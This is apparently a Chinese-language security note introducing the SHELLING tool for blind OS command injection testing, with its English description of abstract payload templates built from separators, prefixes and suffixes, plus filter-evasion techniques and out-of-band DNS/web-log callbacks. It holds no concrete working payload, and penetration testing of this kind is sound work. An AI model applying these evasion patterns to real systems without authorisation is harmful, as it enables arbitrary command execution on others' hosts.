Shell Inject Payload

凡是被认为能够执行操作系统命令的地方,都存在执行命令绕过的可能,导致任意命令执行。使用该工具和Payload可以进行盲shell inject 测试。结合DNS/Web Log平台和API即可快速获取执行结果。

工具地址

https://github.com/ewilded/shelling

工具介绍如下

SHELLING – an offensive approach to the anatomy of improperly written OS command injection sanitisers

In order to improve the accuracy of our blind OS command injection testing, we need a comprehensive, analytic approach. In general, all the injection payloads can fail due to:
– the eventual syntax of the expression we are injecting into (solution: base payload variants)
– input sanitising mechanisms, which refuse forbidden characters (solution: evasive techniques)
– platform specific conditions (e.g. using a windows command on a nix host)
– bad callback method (e.g. asynchronous execution, no outbound traffic etc., solution: base payload variants)

BASE PAYLOAD VARIANTS (BASIC CASES)

  • MALICIOUS_COMMAND (will this ever happen? yes it will, in argument injections like $USER_SUPPLIED or $(USER_SUPPLIED))
  • MALICIOUS_COMMAND+COMMAND_TERMINATOR (in case there was write and command separators were unallowed?)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND (for simple injections with no filtering, like cat $USER_SUPPLIED
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for simple injections with no filtering and appended fixed shite, like cat $USER_SUPPLIED something)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for simple injections like cat \(USER_SUPPLIED something, with filtering like \w+\))
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for injections with shitty filtering like \w+ and some appended fixed shite, like cat $USER_SUPPLIED something)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for injections with appended fixed shite, like cat \(USER_SUPPLIED something, with shitty filtering like ^\w+\s+.*\w+\))
  • PREFIX+MALICIOUS_COMMAND+SUFFIX (“ and $() notations)

EVASIVE TECHNIQUES USED
– alternative COMMAND_SEPARATORS
– alternative ARGUMENT_SEPARATORS
– alternative COMMAND_TERMINATORS
– additional prefixes and suffixes to go around lax filters
– additional prefixes and suffixes to fit into quoted expressions

Other evasive techniques considered:
– alternative payloads to avoid particular badcharacters
– encoding-related variations, like double URL encoding